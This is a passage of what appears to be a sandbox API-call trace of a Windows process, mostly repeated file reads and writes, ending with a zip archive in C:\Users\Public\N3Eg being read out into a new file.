lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.507] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.511] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.511] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.514] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.515] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.515] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.516] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.517] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.517] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.518] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x177, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.518] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.519] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.519] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.520] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xb8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.521] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.521] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.522] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x6a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.522] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.523] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.524] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.524] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.525] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x173, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.525] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.526] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.527] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.527] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x121, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.528] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.528] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.529] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.529] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.530] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x155, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.531] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.531] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.532] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x96, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.532] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.533] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.534] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.534] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.535] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.535] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.536] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.536] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.537] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.537] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.538] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.538] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.539] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.539] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.540] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.540] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.541] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.541] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.542] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.542] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.543] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x85, lpOverlapped=0x0) returned 1 [0024.543] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.544] CloseHandle (hObject=0x2b4) returned 1 [0024.606] CloseHandle (hObject=0x2b0) returned 1 [0024.612] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0024.612] wcscpy (in: _Dest=0xb9a3b0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0024.612] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf3c0, lpFilePart=0x4bf3bc | out: lpBuffer="", lpFilePart=0x4bf3bc) returned 0x15 [0024.612] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf3b0 | out: lpFileInformation=0x4bf3b0) returned 1 [0024.612] wcslen (_String="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned 0x1e [0024.612] wcscpy (in: _Dest=0x1501c1a0, _Source="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" | out: _Dest="C:\\Users\\Public\\N3Eg\\N3Eg2.zip") returned="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" [0024.612] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\N3Eg2.zip" (normalized: "c:\\users\\public\\n3eg\\n3eg2.zip"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b0 [0024.613] calloc (_Count=0x1, _Size=0x38) returned 0xb9a3b0 [0024.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd2b4, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x4bd27c, lpOverlapped=0x0 | out: lpBuffer=0x4bd2b4*, lpNumberOfBytesRead=0x4bd27c*=0x1e, lpOverlapped=0x0) returned 1 [0024.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd2b4, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x4bd27c, lpOverlapped=0x0 | out: lpBuffer=0x4bd2b4*, lpNumberOfBytesRead=0x4bd27c*=0x5, lpOverlapped=0x0) returned 1 [0024.613] wcslen (_String="C:\\Users\\Public\\N3Eg") returned 0x14 [0024.614] wcscpy (in: _Dest=0xb9a3f0, _Source="C:\\Users\\Public\\N3Eg" | out: _Dest="C:\\Users\\Public\\N3Eg") returned="C:\\Users\\Public\\N3Eg" [0024.614] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\N3Eg", nBufferLength=0x9, lpBuffer=0x4bf390, lpFilePart=0x4bf38c | out: lpBuffer="", lpFilePart=0x4bf38c) returned 0x15 [0024.614] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\N3Eg", fInfoLevelId=0x0, lpFileInformation=0x4bf380 | out: lpFileInformation=0x4bf380) returned 1 [0024.614] wcslen (_String="C:\\Users\\Public\\N3Eg\\ljkg2") returned 0x1a [0024.614] wcscpy (in: _Dest=0x15010cc0, _Source="C:\\Users\\Public\\N3Eg\\ljkg2" | out: _Dest="C:\\Users\\Public\\N3Eg\\ljkg2") returned="C:\\Users\\Public\\N3Eg\\ljkg2" [0024.614] CreateFileW (lpFileName="C:\\Users\\Public\\N3Eg\\ljkg2" (normalized: "c:\\users\\public\\n3eg\\ljkg2"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b4 [0024.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.618] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, 